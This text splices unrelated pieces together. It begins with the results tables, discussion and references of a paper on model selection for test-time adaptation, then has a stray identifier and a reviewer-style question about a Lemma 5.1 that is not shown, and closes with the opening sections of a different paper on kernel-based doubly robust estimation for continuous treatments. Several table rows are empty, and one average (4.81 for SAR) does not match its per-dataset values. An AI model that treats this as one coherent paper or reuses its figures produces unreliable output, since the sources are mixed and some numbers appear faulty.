| | ADACONTRAST | 64.43±0.01 | 63.70±0.11 | 63.69±0.11 | 37.97±0.43 | 64.43±0.01 | 48.48±0.56 | 64.43±0.01 |
| | LAME | | | | | | | |
| | RMT-SF | 59.22±0.13 | 60.04±0.1 | 60.17±0.07 | 60.17±0.07 | 59.93±0.13 | 60.06±0.12 | 60.33±0.11 |
| IMAGENET-C | SOURCE | | | | | | | |
| | TENT | 27.98±0.07 | 31.08±0.06 | 1.52±0.1 | 29.79±0.16 | 30.29±0.76 | 28.83±0.03 | 31.37±0.03 |
| | EATA | 28.87±0.11 | 14.60±12.38 | 1.96±2.28 | 23.39±16.54 | 32.25±0.99 | 18.74±8.45 | 35.98±1.02 |
| | SAR | 27.14±0.09 | 28.72±0.11 | 8.41±4.6 | 31.19±0.22 | 30.93±0.35 | 29.30±0.45 | 31.30±0.08 |
| | ADACONTRAST | 33.29±0.09 | 31.81±0.14 | 33.29±0.09 | 3.90±0.26 | 31.81±2.01 | 18.94±0.13 | 33.28±0.09 |
| | LAME | | | | | | | |
| | RMT-SF | 28.81±0.05 | 27.54±2.6 | 23.76±0.1 | 23.76±0.1 | 30.51±0.1 | 29.16±0.13 | 31.54±0.15 |
| DOMAINNET-126 | SOURCE | | | | | | | |
| | TENT | 49.92±0.08 | 52.13±0.06 | 8.21±0.11 | 52.13±0.06 | 52.04±0.19 | 50.32±0.08 | 52.44±0.01 |
| | EATA | 50.17±0.06 | 53.37±0.92 | 19.76±23.79 | 53.39±0.95 | 53.30±0.54 | 51.88±0.19 | 54.44±0.27 |
| | SAR | 49.73±0.09 | 50.91±1.15 | 28.48±5.55 | 51.24±0.19 | 51.45±0.44 | 50.55±0.31 | 52.75±0.07 |
| | ADACONTRAST | 56.51±0.04 | 55.69±0.15 | 46.50±0.42 | 19.61±0.79 | 54.32±3.11 | 51.00±0.79 | 56.51±0.04 |
| | LAME | | | | | | | |
| | RMT-SF | 51.02±0.05 | 52.67±0.02 | 46.36±0.64 | 46.36±0.64 | 52.40±0.20 | 52.42±0.11 | 52.70±0.01 |
| IMAGENET-R | SOURCE | | | | | | | |
| | TENT | 37.43±0.28 | 38.92±0.07 | 11.01±0.59 | 38.30±0.17 | 38.40±0.13 | 37.55±0.14 | 38.92±0.07 |
| | EATA | 37.17±0.13 | 43.19±0.75 | 2.35±1.46 | 42.27±0.18 | 42.03±0.43 | 39.70±0.83 | 43.09±0.76 |
| | SAR | 37.09±0.73 | 41.94±0.24 | 24.28±0.71 | 41.94±0.23 | 41.31±1.06 | 37.84±0.17 | 41.94±0.24 |
| | ADACONTRAST | 39.23±0.12 | 39.53±0.14 | 37.94±0.26 | 37.94±0.26 | 38.86±0.78 | 35.80±0.18 | 39.53±0.14 |
| | LAME | | | | | | | |
| | RMT-SF | 36.81±0.16 | 40.97±0.32 | 40.97±0.32 | 40.97±0.32 | 40.64±0.78 | 38.77±0.10 | 40.97±0.32 |
| AVERAGE | TENT | 43.81 (4) | 45.42 (2) | 6.51 (6) | 44.95 (1) | 44.98 (5) | 42.79 (3) | 45.67 (5) |
| | EATA | 44.50 (2) | 43.13 (4) | 11.27 (5) | 44.47 (2) | 47.38 (1) | 42.71 (4) | 49.99 (1) |
| | SAR | 43.36 (5) | 4.81 (5) | 16.22 (4) | 43.28 (3) | 45.74 (4) | 43.68 (2) | 46.50 (3) |
| | ADACONTRAST | 48.37 (1) | 47.68 (1) | 45.36 (1) | 19.12 (6) | 47.36 (2) | 38.56 (6) | 48.44 (2) |
| | LAME | 40.26 (6) | 40.26 (6) | 40.26 (3) | 40.26 (5) | 40.26 (6) | 40.26 (5) | 40.26 (6) |
| | RMT-SF | 43.96 (3) | 45.31 (3) | 42.82 (2) | 42.82 (4) | 45.87 (3) | 45.10 (1) | 46.39 (4) |

Different methods rank differently under different selection strategies. While EATA is clearly the best under the oracle selection strategy (49.99 on average), it is outperformed, for example, by TENT (the 5th method under oracle selection) when using 3 out of 4 surrogate-based metrics. Notably, TENT achieves the 2nd best score across all methods when using surrogate-based metrics (mean accuracy of 45.42). AdaContrast is clearly the best method when using surrogate-based metrics, scoring as the 1st method on all metrics except for the consistency loss.

Table 3: Target accuracy for different model selection strategies when selecting from a pool of all trained models (57 models in total). When selecting the checkpoint across different methods, model selection is more difficult and the gap between oracle and the other selection methods increases. Using the source-accuracy strategy resulted in a very conservative selection of models that did not adapt much.

On using metrics that were part of the training. Using entropy to drive model selection performs poorly if it is one of the main training objectives (SAR, TENT, EATA). This seems intuitive, as optimizing for the entropy using pseudo-labels might lead to degenerate solutions, e.g., consistently predicting only one class with high confidence. This also holds true for the consistency loss and the AdaContrast method. We take a closer look at this phenomenon and see that initially, optimizing entropy leads to better selection results (Fig. 1, first row and column). Nevertheless, once a certain threshold is reached, the quality of the models' solutions gradually deteriorates. We could select a "reasonable" range of entropy by computing it on the source dataset, but this would still require tuning parameters, which is something we wanted to avoid. Interestingly, for the RMT method, which uses a multi-task loss combined with access to the source prototypes, model selection using entropy or consistency works reasonably well, usually a few percent behind the other surrogate-based selection strategies.

No single best surrogate metric. Our results show that there is no surrogate metric that consistently selects the best model on all of the datasets and methods (Fig. 2). The two most promising strategies are based on source accuracy and on a cross-validation selection mechanism. However, there are some exceptions. For example, EATA scored 14.60 on the ImageNet-C benchmark (compared to 35.98 for oracle selection) using the CROSS-ACC strategy. This might be due to the rather large number of hyper-parameters of the EATA method and changes in dataset characteristics. Using source accuracy as the selection mechanism produces stable results, but is often far from optimal. For example, for the TENT method, using source accuracy for selection generates results that are better only than the entropy selection method (see Table 5 for a ranking of selection strategies). One potential caveat of the source-accuracy selection strategy is that it may result in "conservative" model selection, i.e., models that do not change much from the source model.
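To make the selection protocols themselves concrete, the following is a minimal sketch of the offline selection step, assuming all per-configuration statistics (surrogate scores and, for the labeled strategies, accuracies) have been precomputed during the adaptation runs; the dictionary keys and the function name are illustrative placeholders, not our exact implementation.

```python
def select_model(pool, strategy):
    """Pick one adapted model from a pool of hyper-parameter configurations.

    pool: list of dicts, one per configuration, with precomputed fields, e.g.
          {"model": ..., "source_acc": ..., "entropy": ..., "consistency": ...,
           "cross_acc": ..., "acc_100": ..., "oracle_acc": ...}.
    """
    # (score key, whether higher is better) for each selection strategy
    rules = {
        "S-ACC":     ("source_acc",  True),   # accuracy on held-out source data
        "CROSS-ACC": ("cross_acc",   True),   # oracle accuracy on another dataset
        "ENT":       ("entropy",     False),  # mean prediction entropy on test stream
        "CON":       ("consistency", False),  # consistency loss under augmentations
        "100-RND":   ("acc_100",     True),   # accuracy on 100 labeled test images
        "ORACLE":    ("oracle_acc",  True),   # target accuracy (upper bound)
    }
    key, higher_is_better = rules[strategy]
    return max(pool, key=lambda cfg: cfg[key] if higher_is_better else -cfg[key])
```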
Gap significantly increases when selecting across different methods. When performing model selection across a pool of all trained models, i.e., across different methods (Table 3), the gap significantly increases. Notably, when selecting the model based on source accuracy, the LAME method was selected in all of the cases, as it is a conservative method that does not change its outputs much. As a result, using this strategy, an accuracy of 17.7 was achieved on the ImageNet-C benchmark, compared to 35.98 for oracle selection. This shows that each of the surrogate-based strategies has its own limitations and probably should not be used in isolation.

Limited access to the target labels helps a lot. As shown in Table 2, having access to just one hundred target labels consistently improves over the other surrogate-based model selection strategies. In most cases, this strategy results in selecting hyper-parameters that are within 1% of accuracy of the oracle selection.

Figure 1: Correlation plots for the EATA (upper row) and AdaContrast (bottom row) methods between target accuracy (y-axis) and selected surrogate measures (x-axes). **EATA**: (Left) Selecting the model based on the entropy loss works up to some point, after which minimizing the entropy leads to degenerate solutions with low accuracy. However, the transition from favorable to unfavorable solutions is smooth, and separating them would require manual threshold selection. (Center) Selecting the model based on the consistency loss leads to solutions close to the optimal one; however, the margin between viable and suboptimal solutions is rather small. (Right) Selecting the model based on the source accuracy leads to fairly good solutions and clearly isolates degenerate models. **AdaContrast**: Contrary to EATA, entropy-based model selection works quite well, while consistency-based selection produces degenerate solutions. Using source data to measure accuracy allows for optimal model selection.

Figure 2: Target accuracy per selection strategy for different datasets; results aggregate all evaluated test-time adaptation methods. Using test labels (ORACLE and 100-RND) performs consistently the best. The CROSS-ACC strategy works really well on ImageNet-R, but not so well on the other datasets, with evident outliers. The horizontal line separates selection strategies that use target labels.

Figure 3: CIFAR100-C results: the effect of the Dirichlet concentration parameter $\delta$ on model performance for different methods and selection strategies. Even if the surrogate-based metrics match oracle accuracy in the base scenario (uniform class distribution), they may fall short when the temporal correlation is changed.

TTA remains very challenging. In Table 4, we present results for the Long ImageNet-C scenario. Here, for the CROSS-ACC metric, we used the oracle parameters obtained in the original ImageNet-C scenario. We show that this performed poorly for 2 out of 4 evaluated methods (TENT and SAR), which indicates that the optimal parameters depend on the length of the sequence (with some methods being robust to such changes). What is more, in Fig. 3 we controlled for the temporal class correlation. As presented in the figure, the difference between surrogate-based and oracle model selection increases for some of the selection strategies as we increase the task difficulty.

Performance of TTA methods.
In our experiments, we use two very popular TTA benchmarks (CIFAR100-C and ImageNet-C) and two less popular ones (DomainNet-126 and ImageNet-R). As expected, all the methods easily beat the source model in the first two settings. However, when testing on ImageNet-R, most of the methods improve over the source model only by a minor margin, and on DomainNet-126, the AdaContrast method is the only one that does not degrade performance. The lack of success on the last two datasets may be due to the fact that they are not commonly used for method development and that we apply a small batch size (the RMT method also reported results with a batch size of 1, but used exemplars in that setting). This overall underscores the fact that TTA remains challenging, with questionable transferability to novel testing conditions.

6 DISCUSSION

Offline vs. online selection strategy. In this work, we have considered an offline model selection strategy; that is, we run adaptation using multiple models and select the best model afterward using some measure. In TTA, one would ideally select the parameters on the fly, by adjusting to the testing conditions. Nevertheless, evaluating whether existing surrogate measures can serve the purpose of estimating model performance on target data is the first step in that direction.

On the stability of surrogate measures. In general, we have found that existing surrogate-based metrics, after removing the outliers (so, for example, discarding entropy-based selection for the SAR, EATA, and TENT methods), work reasonably well, usually within a few percent of accuracy of the oracle selection, on average. However, all the metrics lack the required stability, and for each of them we have identified at least one scenario in which it worked very poorly.

| Dataset | Method | S-ACC | CROSS-ACC | ENT | CON | MEDIAN | ORACLE |
|---------------|--------|-----------|-----------|----------|----------|----------|----------|
| ImageNet-C Long | TENT | 29.20±1.8 | 25.62±8.11| 0.65±0.56| 30.51±0.86| 22.70±5.3| 31.48±0.17|
| | EATA | 30.23±1.99| 34.64±0.54| 0.41±0.3 | 22.49±15.82| 18.81±6.88| 35.2±0.41 |
| | SAR | 28.57±1.19| 25.35±4.17| 10.34±9.13| 25.78±3.55| 29.44±0.65| 32.18±1.43|
| | RMT-SF | 28.79±0.06| 31.53±0.15| 25.48±0.23| 25.48±0.23| 29.56±0.19| 31.52±0.15|

Table 4: Target accuracy for different hyper-parameter selection strategies when selecting for the Long ImageNet-C scenario. Using the oracle parameters from the standard ImageNet-C benchmark (CROSS-ACC strategy) performs poorly for TENT and SAR. Also, a greater variance in the results can be observed.

Need for more real-world benchmarks. Despite our best efforts, the benchmark proposed here (and in other works) is only a very simplified version of real-world challenges, and the conclusions drawn from this research should be applied to the real world very carefully. In particular, we envision that the challenge of using TTA methods over very long (potentially infinitely long) adaptation phases still requires much more research.

7 CONCLUSIONS

In this work, we evaluated existing test-time adaptation methods on a diverse array of benchmarks using practical model selection strategies, that is, without accessing target labels. The experiments yielded numerous findings. We showed that the accuracy of model selection strategies varies strongly across datasets and adaptation methods, and that out of all evaluated approaches, only the AdaContrast method allows for surrogate-based model selection that matches oracle selection performance.
Finally, we showed the limitations of the current surrogate-based metrics, which are all inferior to a strategy that uses a tiny set of labeled test samples. The study has important practical implications and shows the importance of the model selection problem in TTA, which we believe has not received enough attention from the community. In the experiments, we used various datasets and controlled for the length of the testing sequences and their class correlation, imitating real-world conditions. Yet, these provide only a simplification of the challenges occurring in the real world, and we therefore believe that more work is required on the construction of relevant TTA benchmarks. Nonetheless, we believe that our work is an important step toward harnessing the potential of TTA methods.

Reproducibility statement. We provide all the necessary information required to repeat the experiments. In Sec. 4 (main paper) and Sec. A (Appendix), we refer to the repository we used and provide all the implementation details, hyper-parameter configurations, etc. We will open-source our code upon acceptance.

REFERENCES

Malik Boudiaf, Romain Müller, Ismail Ben Ayed, and Luca Bertinetto. Parameter-free online test-time adaptation. In *CVPR*, pp. 8334–8343, 2022.

Dian Chen, Dequan Wang, Trevor Darrell, and Sayna Ebrahimi. Contrastive test-time adaptation. In *CVPR*, 2022.

Francesco Croce, Maksym Andriushchenko, Vikash Sehwag, Edoardo Debenedetti, Nicolas Flammarion, Mung Chiang, Prateek Mittal, and Matthias Hein. Robustbench: a standardized adversarial robustness benchmark. In *Thirty-fifth Conference on Neural Information Processing Systems Datasets and Benchmarks Track*, 2021.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE conference on computer vision and pattern recognition*, pp. 248–255. IEEE, 2009.

Mario Döbler, Robert A. Marsden, and Bin Yang. Robust mean teacher for continual and gradual test-time adaptation. In *CVPR*, 2023.

Yaroslav Ganin and Victor S. Lempitsky. Unsupervised domain adaptation by backpropagation. In *ICML*, 2015.

Taesik Gong, Jongheon Jeong, Taewon Kim, Yewon Kim, Jinwoo Shin, and Sung-Ju Lee. NOTE: Robust continual test-time adaptation against temporal correlation. In *Advances in Neural Information Processing Systems (NeurIPS)*, 2022.

Mononito Goswami, Cristian I. Challu, Laurent Callot, Lenon Minorics, and Andrey Kan. Unsupervised model selection for time series anomaly detection. In *ICLR*, 2023.

Ishaan Gulrajani and David Lopez-Paz. In search of lost domain generalization. In *ICLR*, 2021.

Kaiming He, Haoqi Fan, Yuxin Wu, Saining Xie, and Ross Girshick. Momentum contrast for unsupervised visual representation learning. In *CVPR*, 2020.

Dan Hendrycks and Thomas Dietterich. Benchmarking neural network robustness to common corruptions and perturbations. *Proceedings of the International Conference on Learning Representations*, 2019.

Dan Hendrycks, Steven Basart, Norman Mu, Saurav Kadavath, Frank Wang, Evan Dorundo, Rahul Desai, Tyler Zhu, Samyak Parajuli, Mike Guo, Dawn Song, Jacob Steinhardt, and Justin Gilmer. The many faces of robustness: A critical analysis of out-of-distribution generalization. *ICCV*, 2021.

Alex Krizhevsky. Learning multiple layers of features from tiny images. pp. 32–33, 2009.
URL https://www.cs.toronto.edu/~kriz/learning-features-2009-TR.pdf.

Jian Liang, Dapeng Hu, and Jiashi Feng. Do we really need to access the source data? Source hypothesis transfer for unsupervised domain adaptation. In *ICML*, 2020.

Zheda Mai, Ruiwen Li, Jihwan Jeong, David Quispe, Hyunwoo Kim, and Scott Sanner. Online continual learning in image classification: An empirical survey. *Neurocomputing*, 469:28–51, 2022.

John Miller, Rohan Taori, Aditi Raghunathan, Shiori Sagawa, Pang Wei Koh, Vaishaal Shankar, Percy Liang, Yair Carmon, and Ludwig Schmidt. Accuracy on the line: On the strong correlation between out-of-distribution and in-distribution generalization. In *ICML*, 2021.

A. Tuan Nguyen, Thanh Nguyen-Tang, Ser-Nam Lim, and Philip H.S. Torr. Tipi: Test time adaptation with transformation invariance. In *CVPR*, pp. 24162–24171, 2023.

Shuaicheng Niu, Jiaxiang Wu, Yifan Zhang, Yaofo Chen, Shijian Zheng, Peilin Zhao, and Mingkui Tan. Efficient test-time model adaptation without forgetting. In *ICML*, 2022.
TjGJFkU3xL
I understand that $q_0$ represents the maximum value for the equation in Lemma 5.1. However, I am unsure about the connection between Lemma 5.1 and Equation (8). In other words, why do we need to minimize the empirical quantity for the equation in Lemma 5.1?
Doubly Robust Proximal Causal Learning for Continuous Treatments

Yong Wu^{1,3,4,5} Yanwei Fu^{2} Shouyan Wang^{1,3,4,5,6,7} Xinwei Sun^{2*}

^{1}Institute of Science and Technology for Brain-Inspired Intelligence, Fudan University ^{2}School of Data Science, Fudan University ^{3}Zhangjiang Fudan International Innovation Center ^{4}Key Laboratory of Computational Neuroscience and Brain-Inspired Intelligence (Fudan University) ^{5}MOE Frontiers Center for Brain Science, Fudan University ^{6}Shanghai Engineering Research Center of AI & Robotics, Fudan University ^{7}Engineering Research Center of AI & Robotics, Ministry of Education, Fudan University

Abstract

Proximal causal learning is a powerful framework for identifying the causal effect under the existence of unmeasured confounders. Within this framework, the doubly robust (DR) estimator was derived and has shown its effectiveness in estimation, especially when a model assumption is violated. However, the current form of the DR estimator is restricted to binary treatments, while the treatments can be continuous in many real-world applications. The primary obstacle to continuous treatments resides in the delta function present in the original DR estimator, making it infeasible for causal effect estimation and introducing a heavy computational burden in nuisance function estimation. To address these challenges, we propose a kernel-based DR estimator that can well handle continuous treatments for proximal causal learning. Equipped with its smoothness, we show that its oracle form is a consistent approximation of the influence function. Further, we propose a new approach to efficiently solve for the nuisance functions. We then provide a comprehensive convergence analysis in terms of the mean squared error. We demonstrate the utility of our estimator on synthetic datasets and real-world applications.

1 INTRODUCTION

Causal effect estimation is a significant issue in many fields, such as the social sciences (Hedström & Ylikoski, 2010), economics (Varian, 2016), and medicine (Yazdani & Boerwinkle, 2015). A critical challenge in causal inference is non-compliance with randomization due to the presence of unobserved confounders, which can induce bias in the estimation. One approach to address this challenge is the proximal causal learning (PCL) framework (Miao et al., 2018a; Tchetgen et al., 2020; Cui et al., 2023), which offers an opportunity to learn causal effects when the ignorability condition fails. This framework employs two proxies, a treatment-inducing proxy and an outcome-inducing proxy, to identify the causal effect by estimating the bridge/nuisance functions. In particular, Cui et al. (2023) derived the doubly robust estimator within the PCL framework, which combines the estimator obtained from the treatment bridge function with the estimator obtained from the outcome bridge function. The doubly robust estimator has been widely used in causal effect estimation (Bang & Robins, 2005), as it is able to tolerate violations of the model assumptions on the bridge functions. However, current doubly robust estimators (Cui et al., 2023) within the proximal causal framework mainly focus on binary treatments, whereas the treatments can be continuous in many real-world scenarios, including social science, biology, and economics.
For example, in therapy studies, we are interested not only in estimating the effect of receiving a drug but also in the effect of the drug dose. Another example comes from the data of Donohue III & Levitt (2001), focused on policy-making, where one wishes to estimate the effect of legalized abortion on the crime rate.

*Corresponding author
^{1}Code is available at https://github.com/yezichu/PCL_Continuous_Treatment

Previous work on causal effects for continuous treatments has focused primarily on the unconfoundedness assumption (Kallus & Zhou, 2018; Colangelo & Lee, 2020). However, extending these methods to the proximal causal framework encounters several key challenges. Firstly, the Proximal Inverse Probability Weighting (PIPW) part of the original doubly robust (DR) estimator relies on a delta function centered at the treatment value being analyzed, rendering it impractical for empirically estimating causal effects with continuous treatments. Secondly, deriving the influence function involves dealing with the Gateaux derivatives of the bridge functions, which is particularly intricate due to their implicit nature. Lastly, the existing estimation process for the bridge functions requires running an optimization for each new treatment, rendering it computationally inefficient for practical applications. In light of these formidable challenges, our contribution lies in addressing the open question of deriving the DR estimator for continuous treatments within the proximal causal framework.

To address these challenges, we propose a kernel-based method that can well handle continuous treatments for PCL. Specifically, we incorporate the kernel function into the PIPW estimator as a smooth approximation to the causal effect. We then derive the DR estimator and show its consistency for a broad family of kernel functions. Equipped with this smoothness, we show that the DR estimator coincides with the influence function. To overcome the computational issue in nuisance function estimation, we propose to estimate the propensity score and incorporate it into a min-max optimization problem, which suffices to estimate the nuisance functions for all treatments. We show that our estimator enjoys an $O(n^{-4/5})$ convergence rate in mean squared error (MSE). We demonstrate its utility and efficiency on synthetic data and on the policy-making data of Donohue III & Levitt (2001).

Contributions. To summarize, our contributions are:
1. We propose a kernel-based DR estimator that is provably consistent for continuous treatment effects within the proximal causal framework.
2. We efficiently solve for the bridge functions for all treatments with only a single optimization.
3. We present a convergence analysis of our estimator in terms of MSE.
4. We demonstrate the utility of our estimator on two synthetic datasets and a real-world dataset.

2 BACKGROUND

Proximal Causal Learning. Proximal causal learning (PCL) dates back to Kuroki & Pearl (2014), who established the identification of causal effects in the presence of unobserved confounders under linear models. Miao et al. (2018a;b) and extensions thereof (Shi et al., 2020; Tchetgen et al., 2020) then proposed to leverage two proxy variables for causal identification by estimating the outcome bridge function. Building upon this foundation, Cui et al. (2023) introduced a treatment bridge function and incorporated it into the Proximal Inverse Probability Weighting (PIPW) estimator.
Besides, under binary treatments, they derived the Proximal Doubly Robust (PDR) estimator via influence functions. However, continuous treatments pose a challenge, as the treatment effect is not pathwise differentiable with respect to them, preventing the derivation of a DR estimator. In this paper, we employ a kernel method that is provably consistent for treatment effect estimation. We further show that the kernel-based DR estimator can be derived from influence functions.

Causal Inference for Continuous Treatments. The most common approaches for estimating continuous treatment effects are regression-based models (Imbens, 2004; Hill, 2011), generalized propensity score-based models (Imbens, 2000; Hirano & Imbens, 2004; Imai & Van Dyk, 2004), and entropy balancing-based methods (Hainmueller, 2012; Imai & Ratkovic, 2014; Tübbicke, 2021). Furthermore, Kennedy et al. (2017), Kallus & Zhou (2018), and Colangelo & Lee (2020) extended DR estimation to continuous treatments by combining regression-based models with generalized propensity score-based models. However, deriving the DR estimator for continuous treatments within the proximal causal framework has remained open. In this paper, we fill this gap with a new kernel-based DR estimator that provably derives from the influence function.

Nuisance Parameter Estimation. In proximal causal learning, one must estimate nuisance parameters to obtain the causal effect. Many methods have been proposed for this goal (Tchetgen et al., 2020; Singh, 2020; Xu et al., 2021; Kompa et al., 2022), but they primarily focus on the estimation of the outcome bridge function. Recently, Kallus et al. (2021) and Ghassami et al. (2022) provided non-parametric estimates of the treatment bridge function, but they are restricted to binary treatments. When it comes to continuous treatments, existing methods can be computationally inefficient, since they have to re-solve an optimization problem for each treatment. In this paper, we propose a new method that can efficiently solve for the bridge functions for all treatments with only a single optimization.

3 PROXIMAL CAUSAL INFERENCE

Problem setup. We consider estimating the Average Causal Effect (ACE) of a continuous treatment $A$ on an outcome $Y$: $\mathbb{E}[Y(a)]$, where $Y(a)$, for any $a \in \text{supp}(A)$, denotes the potential outcome when the treatment $A = a$ is received. We denote by $X$ and $U$ the observed covariates and unobserved confounders, respectively. To estimate $\mathbb{E}[Y(a)]$, we make the following consistency assumptions, which are widely adopted in causal inference (Peters et al., 2017):

Assumption 3.1 (Consistency and Positivity). We assume (i) $Y(A) = Y$ almost surely (a.s.); and (ii) $0 < p(A = a \mid U = u, X = x) < 1$ a.s.

Assumption 3.2 (Latent ignorability). We assume $Y(a) \perp A \mid U, X$.

Assump. 3.2 means that the strong ignorability condition may fail due to the presence of the unobserved confounder $U$. To account for such confounding bias, proximal causal learning incorporates a treatment-inducing proxy $Z$ and an outcome-inducing proxy $W$. As illustrated in Fig. 1, these proxies should satisfy the following conditional independence conditions:

Assumption 3.3 (Conditional Independence of Proxies). The treatment-inducing proxy $Z$ and the outcome-inducing proxy $W$ satisfy: (i) $Y \perp Z \mid A, U, X$; and (ii) $W \perp (A, Z) \mid U, X$.

Equipped with such conditional independence, previous work by Miao et al. (2018a) and Cui et al.
(2023) demonstrated that the causal effect, denoted $\beta(a)$, can be expressed as follows:

$$\mathbb{E}[Y(a)] = \mathbb{E}[h_0(a, W, X)] = \mathbb{E}[\mathbb{I}(A = a)q_0(a, Z, X)Y], \tag{1}$$

where $h_0$ and $q_0$ are two nuisance/bridge functions such that the following equations hold:

$$R_h(h_0; y) := \mathbb{E}[Y - h_0(A, W, X) \mid A, Z, X] = 0, \tag{2}$$
$$R_q(q_0; p) := \mathbb{E}[q_0(A, Z, X) - 1/p(A \mid W, X) \mid A, W, X] = 0. \tag{3}$$

To ensure the existence and uniqueness of solutions to the above equations, we additionally assume (Miao et al., 2018a; Tchetgen et al., 2020; Cui et al., 2023):

Assumption 3.4. Let $\nu$ denote any square-integrable function. For any $(a, x)$, we have:
1. (Completeness for outcome bridge functions). $\mathbb{E}[\nu(U) \mid W, a, x] = 0$ and $\mathbb{E}[\nu(Z) \mid W, a, x] = 0$ iff $\nu(U) = 0$ almost surely.
2. (Completeness for treatment bridge functions). $\mathbb{E}[\nu(U) \mid Z, a, x] = 0$ and $\mathbb{E}[\nu(W) \mid Z, a, x] = 0$ iff $\nu(U) = 0$ almost surely.

Under Assump. 3.4, we can solve for $h_0$ and $q_0$ via several optimization approaches derived from conditional moment equations, including two-stage penalized regression (Singh, 2020; Mastouri et al., 2021; Xu et al., 2021), maximum moment restriction (Zhang et al., 2020; Muandet et al., 2020a), and minimax optimization (Dikkala et al., 2020; Muandet et al., 2020b; Kallus et al., 2021). With $h_0, q_0$ solved, we can estimate $\mathbb{E}[Y(a)]$ via

$$\mathbb{E}_n[Y(a)] = \frac{1}{n} \sum_{i=1}^{n} h_0(a, w_i, x_i), \quad \text{or} \quad \mathbb{E}_n[Y(a)] = \frac{1}{n} \sum_{i=1}^{n} \mathbb{I}(a_i = a)q_0(a_i, z_i, x_i)y_i.$$

Furthermore, Cui et al. (2023) propose a doubly robust estimator to improve robustness against misspecification of the bridge functions:

$$\mathbb{E}[Y(a)] = \mathbb{E}[\mathbb{I}(A = a)q_0(a, Z, X)(Y - h_0(a, W, X)) + h_0(a, W, X)] \tag{4}$$
$$\approx \frac{1}{n} \sum_{i=1}^{n} \big(\mathbb{I}(a_i = a)q_0(a, z_i, x_i)(y_i - h_0(a, w_i, x_i)) + h_0(a, w_i, x_i)\big). \tag{5}$$

Although this proximal learning method can efficiently estimate $\mathbb{E}[Y(a)]$ for binary treatments, it suffers from several problems when it comes to continuous treatments. First, for any $a \in \text{supp}(A)$, it almost surely holds that no sample $i$ satisfies $a_i = a$ for $i = 1, \ldots, n$, making Eq. 5 infeasible. Besides, it is challenging to derive the influence function for continuous treatments, as it involves computing derivatives of the implicit functions $h_0$ and $q_0$. Lastly, to estimate $q_0$, previous methods suffered a large computational cost, since they had to re-run the optimization algorithm for each new treatment, making them inapplicable in real-world applications.

To resolve these problems for continuous treatments, we first introduce a kernel-based method in Sec. 4, which can estimate $\mathbb{E}[Y(a)]$ in a feasible way. Then, in Sec. 5, we introduce a new optimization algorithm that can estimate $h_0, q_0$ for all treatments with a single optimization. Finally, we present the theoretical results in Sec. 6.

4 PROXIMAL CONTINUOUS ESTIMATION

In this section, we introduce a kernel-based doubly robust estimator for $\beta(a) := \mathbb{E}[Y(a)]$ with continuous treatments. We first present the estimator in Sec. 4.1, and then show in Sec. 4.2 that it well approximates the influence function for $\beta(a)$.
4.1 KERNEL-BASED PROXIMAL ESTIMATION

As mentioned above, the main challenge for continuous treatments lies in the estimation infeasibility caused by the indicator function in the proximal inverse probability weighted (PIPW) estimator with $q_0$:
$$\hat{\beta}(a) = \frac{1}{n} \sum_{i=1}^{n} \mathbb{I}(a_i = a) q_0(a, z_i, x_i) y_i.$$
To resolve this problem, we note that the indicator function can be viewed as a Dirac delta function $\delta_a(a_i)$. The average of this Dirac delta function over the $n$ samples, $\frac{1}{n} \sum_{i=1}^{n} \delta_a(a_i)$, approximates the marginal probability $P(a)$ (Doucet et al., 2009), which equals 0 when $A$ is continuous. To address this, we introduce a kernel function $K(A - a)$ that alleviates the unit concentration of the Dirac delta. We can then rewrite the PIPW estimator as follows, dubbed the Proximal Kernel Inverse Probability Weighted (PKIPW) estimator:
$$\hat{\beta}(a) = \frac{1}{n} \sum_{i=1}^{n} K_{h_{bw}}(a_i - a) q_0(a, z_i, x_i) y_i, \tag{6}$$
where $h_{bw} > 0$ is the bandwidth, such that $K_{h_{bw}}(a_i - a) = \frac{1}{h_{bw}} K\left(\frac{a_i - a}{h_{bw}}\right)$. The kernel function $K_{h_{bw}}(A - a)$, widely adopted in density estimation, assigns a non-zero weight to each sample, thus making it feasible to estimate $\beta(a)$. To demonstrate its validity, we next show that it approximates $\beta(a)$ well. This result requires the kernel function $K$ to be bounded and differentiable, as formally stated below.

Assumption 4.1. The second-order symmetric kernel function $K(\cdot)$ is bounded and differentiable, i.e.,
$$\int K(u)\, du = 1, \quad \int u K(u)\, du = 0, \quad \kappa_2(K) = \int u^2 K(u)\, du < \infty.$$
We define $\Omega_2^{(i)}(K) = \int \big(K^{(i)}(u)\big)^2\, du$.

Assump. 4.1 adheres to the conventional requirements of nonparametric kernel estimation and holds for widely adopted kernel functions, including the Epanechnikov and Gaussian kernels. Under Assump. 4.1, we have the following theorem:

Theorem 4.2. Under Assump. 4.1, suppose $\beta(a) = \mathbb{E}[\mathbb{I}(A = a) q_0(a, Z, X) Y]$ is continuous and bounded uniformly with respect to $a$; then we have
$$\mathbb{E}[Y(a)] = \mathbb{E}[\mathbb{I}(A = a) q_0(a, Z, X) Y] = \lim_{h_{bw} \to 0} \mathbb{E}[K_{h_{bw}}(A - a) q_0(a, Z, X) Y].$$

Remark 4.3. The kernel function has been widely used in machine learning applications (Kallus & Zhou, 2018; Kallus & Uehara, 2020; Colangelo & Lee, 2020; Klosin, 2021). Different from these works, we are the first to integrate it into proximal estimation to handle continuous treatments.

Remark 4.4. The choice of bandwidth $h_{bw}$ is a trade-off between bias and variance. When $h_{bw}$ is small, the kernel estimator has less bias, as shown in Thm. 4.2; however, its variance increases. In Sec. 6, we show that the optimal rate for $h_{bw}$ is $O(n^{-1/5})$, which leads to an MSE converging at the rate $O(n^{-4/5})$ for our kernel-based doubly robust estimator.

Similar to Eq. 6, we can therefore derive the Proximal Kernel Doubly Robust (PKDR) estimator as:
$$\hat{\beta}(a) = \frac{1}{n} \sum_{i=1}^{n} \left[\frac{1}{h_{bw}} K\left(\frac{a_i - a}{h_{bw}}\right) q_0(a, z_i, x_i)\big(y_i - h_0(a, w_i, x_i)\big) + h_0(a, w_i, x_i)\right]. \tag{7}$$
Similar to Thm. 4.2, we can also show that this estimator is unbiased as $h_{bw} \to 0$.
